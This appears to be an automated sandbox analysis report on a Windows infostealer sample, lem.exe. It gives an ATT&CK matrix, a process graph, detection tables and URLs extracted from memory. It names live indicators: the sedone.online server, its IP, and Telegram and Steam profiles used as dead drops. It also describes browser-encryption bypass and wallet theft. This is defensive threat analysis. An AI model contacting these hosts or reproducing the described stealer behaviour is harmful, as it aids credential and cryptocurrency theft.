            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
            Process Injection
            121
            Masquerading
            Cached Domain Credentials11
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Valid Accounts
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Virtualization/Sandbox Evasion
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
            Process Injection
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575515 Sample: lem.exe Startdate: 15/12/2024 Architecture: WINDOWS Score: 100 51 sedone.online 2->51 53 t.me 2->53 55 pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ 2->55 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Multi AV Scanner detection for submitted file 2->75 77 4 other signatures 2->77 10 lem.exe 29 2->10         started        signatures3 process4 process5 12 cmd.exe 3 10->12         started        file6 43 C:\Users\user\AppData\...\Corrections.com, PE32 12->43 dropped 79 Drops PE files with a suspicious file extension 12->79 16 Corrections.com 44 12->16         started        21 tasklist.exe 1 12->21         started        23 cmd.exe 2 12->23         started        25 7 other processes 12->25 signatures7 process8 dnsIp9 45 sedone.online 116.203.12.241, 443, 49740, 49741 HETZNER-ASDE Germany 16->45 47 t.me 149.154.167.99, 443, 49738 TELEGRAMRU United Kingdom 16->47 49 127.0.0.1 unknown unknown 16->49 41 C:\ProgramData\2N7Y58YCJW47\TR9Z5X, PE32+ 16->41 dropped 63 Attempt to bypass Chrome Application-Bound Encryption 16->63 65 Found many strings related to Crypto-Wallets (likely being stolen) 16->65 67 Found API chain indicative of sandbox detection 16->67 69 4 other signatures 16->69 27 chrome.exe 16->27         started        30 cmd.exe 1 16->30         started        32 conhost.exe 21->32         started        file10 signatures11 process12 dnsIp13 59 192.168.2.4, 138, 443, 49723 unknown unknown 27->59 61 239.255.255.250 unknown Reserved 27->61 34 chrome.exe 27->34         started        37 conhost.exe 30->37         started        39 timeout.exe 1 30->39         started        process14 dnsIp15 57 www.google.com 142.250.181.132, 443, 49752, 49753 GOOGLEUS United States 34->57

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            lem.exe16%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\ProgramData\2N7Y58YCJW47\TR9Z5X0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\628056\Corrections.com0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://sedone.online0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            t.me
            149.154.167.99
            truefalse
              high
              www.google.com
              142.250.181.132
              truefalse
                high
                sedone.online
                116.203.12.241
                truetrue
                  unknown
                  pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabCorrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.drfalse
                        high
                        https://duckduckgo.com/ac/?q=Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.drfalse
                          high
                          http://anglebug.com/4633chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://anglebug.com/7382chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://issuetracker.google.com/284462263chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://google-ohttp-relay-join.fastly-edge.com/Cchrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://docs.google.com/chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://google-ohttp-relay-join.fastly-edge.com/Jchrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://anglebug.com/7714chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://google-ohttp-relay-join.fastly-edge.com/Mchrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://google-ohttp-relay-join.fastly-edge.com/Wchrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://anglebug.com/6248chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://google-ohttp-relay-join.fastly-edge.com/Tchrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://google-ohttp-relay-join.fastly-edge.com/Xchrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://anglebug.com/6929chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://anglebug.com/5281chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://google-ohttp-relay-join.fastly-edge.com/achrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://google-ohttp-relay-join.fastly-edge.com/echrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://issuetracker.google.com/255411748chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://anglebug.com/7246chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://anglebug.com/7369chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://anglebug.com/7489chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://chrome.google.com/webstorechrome.exe, 0000000F.00000003.2121171342.0000413000EE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://drive-daily-2.corp.google.com/chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://polymer.github.io/PATENTS.txtchrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.drfalse
                                                                                        high
                                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaCorrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.autoitscript.com/autoit3/XCorrections.com, 0000000A.00000000.1730066094.00000000009F5000.00000002.00000001.01000000.00000007.sdmp, Corrections.com.1.dr, Appeals.0.drfalse
                                                                                            high
                                                                                            https://issuetracker.google.com/161903006chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.ecosia.org/newtab/Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.drfalse
                                                                                                high
                                                                                                https://drive-daily-1.corp.google.com/chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://t.me/detct0rd0wntgMozilla/5.0Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://drive-daily-5.corp.google.com/chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://anglebug.com/3078chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://anglebug.com/7553chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://anglebug.com/5375chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://anglebug.com/5371chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://anglebug.com/4722chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://anglebug.com/7556chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCorrections.com, 0000000A.00000002.2820141571.0000000004532000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.drfalse
                                                                                                                        high
                                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://sedone.onlineCorrections.com, 0000000A.00000002.2823074845.0000000004C3A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://anglebug.com/6692chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://anglebug.com/3502chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://anglebug.com/3623chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://anglebug.com/3625chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://anglebug.com/3624chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://anglebug.com/5007chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://anglebug.com/3862chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000F.00000003.2121360637.0000413000CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127554316.0000413000384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119669400.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127832603.0000413000CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127601269.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119776316.0000413000CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2121171342.0000413000EE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://anglebug.com/4836chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://issuetracker.google.com/issues/166475273chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://anglebug.com/4384chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://anglebug.com/3970chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://apis.google.comchrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allCorrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://labs.google.com/search?source=ntpchrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://anglebug.com/7604chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://anglebug.com/7761chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/hkchrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://ogs.google.com/widget/app/so?eom=1chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://anglebug.com/7760chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgCorrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoCorrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/5901chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://anglebug.com/3965chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
